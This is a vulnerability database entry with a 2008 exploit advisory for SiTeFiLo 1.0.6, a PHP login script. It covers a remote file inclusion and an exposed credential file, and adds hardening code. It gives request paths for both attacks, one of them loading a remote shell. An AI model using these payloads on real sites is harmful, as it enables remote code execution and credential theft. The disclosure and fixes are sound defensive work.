https://www.exploit-db.com/exploits/7444
https://www.securityfocus.com/bid/84635
https://cxsecurity.com/issue/WLB-2009010004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-485
mariovaldez simple_text-file_login_script permissions, privileges and access control vulnerability






Vulnerability ID | 1117040 | Vulnerability type | Permissions, privileges and access control |
Published | 2008-12-14 | Updated | 2008-12-30 |
CVE-2008-5762 | CNNVD-200812-485 |
Platform | PHP | CVSS score | 5.0 |
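|Vulnerability source
|Vulnerability details
SiTeFiLo is a simple PHP-based login authentication script. Simple Text-File Login Script (SiTeFiLo) version 1.0.6 stores sensitive information under the web root without sufficient access control, which allows remote attackers to download the database file via a direct request to slog_users.txt.
|Exploit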
[START]
#########################################################################################
[0x01] Information:
Script : Simple Text-File Login script 1.0.6
Download : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
Vulnerability : Remote File Inclusion / Sensitive Data Disclosure
Author : Osirys
Contact : osirys[at]live[dot]it
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay
Notes : *
* The name of this login system is Simple Text-File Login script, so we can already
understand that this script will use a .txt file to do its job. So it's like if
the coder didn't think that a login system like this isn't vulnerable. Weird !
Anyway, it's vulnerable to Remote File Inclusion also, here we are !
#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######
Bugged file is: /[path]/slogin_lib.inc.php
[CODE]
if (!isset ($slogin_path)) {
    $slogin_path = "";
}
[/CODE]
If $slogin_path is not given, it becomes a null variable. Scrolling down the source code,
you can see an include of that variable everywhere.
Just one of the few vulnerable includes:
[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this:
[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
The header.inc.php file, like all the files of this cms, is in the same dir as
slogin_lib.inc.php, so a fix could be just to include the file, without including
a variable, which should be null because all the files are in the same dir.
[CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE]
[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######
* As I already said, this is not a real bug, because it is the intention of the author
to use a .txt file as a login storage. But it's weird, it's insecure ! Maybe he just
sees the goodness of people (hehe xD)
In this login system, sensitive data like username and password are stored in a local
text file, so we can get sensitive information just going to this txt file. The name of
this file is set in slogin_lib.inc.php. By default it is: slog_users.txt
[!] EXPLOIT: /[path]/slog_users.txt
#########################################################################################
[/END]
# milw0rm.com [2008-12-14]
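
The two weaknesses described above (a request-influenced include prefix, and slog_users.txt being reachable under the web root), shown with a hardened counterpart. This is an added PHP example, not code from the advisory or from SiTeFiLo; SLOGIN_BASE, SLOGIN_USERS_FILE, the private/ directory and both function names are assumptions.

```php
<?php
// Added illustration, not SiTeFiLo source. SLOGIN_BASE, SLOGIN_USERS_FILE,
// slogin_include() and slogin_users_file_exposed() are hypothetical names.

// Vulnerable pattern from the advisory, kept as a comment for comparison:
//   if (!isset ($slogin_path)) { $slogin_path = ""; }
//   include_once ($slogin_path . "header.inc.php");
// With register_globals on, a request parameter can pre-set $slogin_path.

// Hardened: the base directory is a constant derived from this file's
// location, so no request-supplied value can become the include prefix.
define('SLOGIN_BASE', __DIR__);

// Assumed layout: the credential file lives outside the web root.
define('SLOGIN_USERS_FILE', dirname(__DIR__) . '/private/slog_users.txt');

function slogin_include(string $name): void
{
    // Only bare file names of the script's own components are accepted.
    $allowed = ['header.inc.php'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("include not allowed: $name");
    }
    include_once SLOGIN_BASE . DIRECTORY_SEPARATOR . $name;
}

// True when the user file resolves to a path under the document root,
// i.e. a direct request for it would be served.
function slogin_users_file_exposed(string $usersFile, string $docRoot): bool
{
    if ($usersFile === '' || $docRoot === '') {
        return false; // realpath('') would resolve to the working directory
    }
    $file = realpath($usersFile);
    $root = realpath($docRoot);
    if ($file === false || $root === false) {
        return false; // nothing on disk to serve
    }
    return strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0;
}

// Deployment check in the web context: fail closed if the file is exposed.
if (PHP_SAPI !== 'cli'
    && slogin_users_file_exposed(SLOGIN_USERS_FILE, $_SERVER['DOCUMENT_ROOT'] ?? '')) {
    error_log('slog_users.txt is inside the web root; move it or deny access');
    http_response_code(500);
    exit;
}
```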
|Affected products
MarioValdez Simple Text-File Login Script 1.0.6
|References
Source: MILW0RM
Name: 7444
Link: http://www.milw0rm.com/exploits/7444
Source: SREASON
Name: 4847
Link: http://securityreason.com/securityalert/4847
Source: SECUNIA
Name: 33110
Link: http://secunia.com/advisories/33110
Source: OSVDB
Name: 50712
Link: http://osvdb.org/50712